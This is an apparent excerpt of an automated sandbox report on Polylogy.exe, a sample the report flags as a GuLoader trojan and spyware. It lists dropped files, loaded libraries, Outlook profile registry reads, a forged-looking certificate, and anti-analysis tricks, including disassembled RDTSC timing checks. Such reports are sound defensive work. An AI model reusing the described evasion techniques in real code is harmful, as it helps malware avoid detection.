Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_39624958	4_2_39624958
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_39621B14	4_2_39621B14
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_3962B450	4_2_3962B450

Source: C:\Users\user\Desktop\Polylogy.exe

Code function: String function: 00402AD0 appears 51 times

Source: Polylogy.exe

Static PE information: invalid certificate

Source: Polylogy.exe, 00000004.00000002.4536512905.00000000359B7000.00000004.00000010.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Polylogy.exe

Source: Polylogy.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/17@5/5

Source: C:\Users\user\Desktop\Polylogy.exe

Code function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040458C

Source: C:\Users\user\Desktop\Polylogy.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Users\user\Desktop\Polylogy.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister

Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Polylogy.exe

File created: C:\Users\user\AppData\Local\Temp\nsw2DD8.tmp

Jump to behavior

Source: Polylogy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Polylogy.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Polylogy.exe

Virustotal: Detection: 26%

Source: C:\Users\user\Desktop\Polylogy.exe

File read: C:\Users\user\Desktop\Polylogy.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Polylogy.exe "C:\Users\user\Desktop\Polylogy.exe"
Source: C:\Users\user\Desktop\Polylogy.exe	Process created: C:\Users\user\Desktop\Polylogy.exe "C:\Users\user\Desktop\Polylogy.exe"
Source: C:\Users\user\Desktop\Polylogy.exe	Process created: C:\Users\user\Desktop\Polylogy.exe "C:\Users\user\Desktop\Polylogy.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: stempelpudernes.lnk.0.dr	LNK file: ..\Pictures\muringerne\giggliest.pha
Source: dinosaurusserne.lnk.0.dr	LNK file: ..\..\..\..\Users\Public\Pictures\eksistensberettigelsen.pre

Source: C:\Users\user\Desktop\Polylogy.exe

File written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Rebone\indberegne.ini

Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.3393295886.0000000003396000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Polylogy.exe

Code function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040620C

Source: C:\Users\user\Desktop\Polylogy.exe

Code function: 0_2_10002D50 push eax; ret

0_2_10002D7E

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system. 2) Organization 'Forstenede' is not a known legitimate company. 3) Email domain 'Disgracia.No' appears suspicious and non-corporate. 4) Large time gap between compilation date (2013) and certificate creation (2024) suggests possible certificate manipulation. 5) Organization unit name 'Timerau belted Preaggressiveness' is nonsensical and appears randomly generated. 6) While the certificate dates are valid relative to current date (Feb 2025), the overall certificate chain is untrustworthy. 7) Though the country (GB) is generally reputable, other certificate elements strongly suggest this is a fake identity trying to appear legitimate by using a trusted country code.

Source: C:\Users\user\Desktop\Polylogy.exe

File created: C:\Users\user\AppData\Local\Temp\nsj3433.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Polylogy.exe	API/Special instruction interceptor: Address: 3AB81C1
Source: C:\Users\user\Desktop\Polylogy.exe	API/Special instruction interceptor: Address: 1FE81C1

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Polylogy.exe	RDTSC instruction interceptor: First address: 3A91D8B second address: 3A91D8B instructions: 0x00000000 rdtsc 0x00000002 test dl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F31F06EA11Dh 0x00000008 inc ebp 0x00000009 cmp si, E17Eh 0x0000000e inc ebx 0x0000000f cmp edi, 6641DD63h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Polylogy.exe	RDTSC instruction interceptor: First address: 1FC1D8B second address: 1FC1D8B instructions: 0x00000000 rdtsc 0x00000002 test dl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F31F0736D8Dh 0x00000008 inc ebp 0x00000009 cmp si, E17Eh 0x0000000e inc ebx 0x0000000f cmp edi, 6641DD63h 0x00000015 rdtsc

Source: C:\Users\user\Desktop\Polylogy.exe	Memory allocated: 5290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Memory allocated: 35CB0000 memory reserve \| memory write watch	Jump to behavior
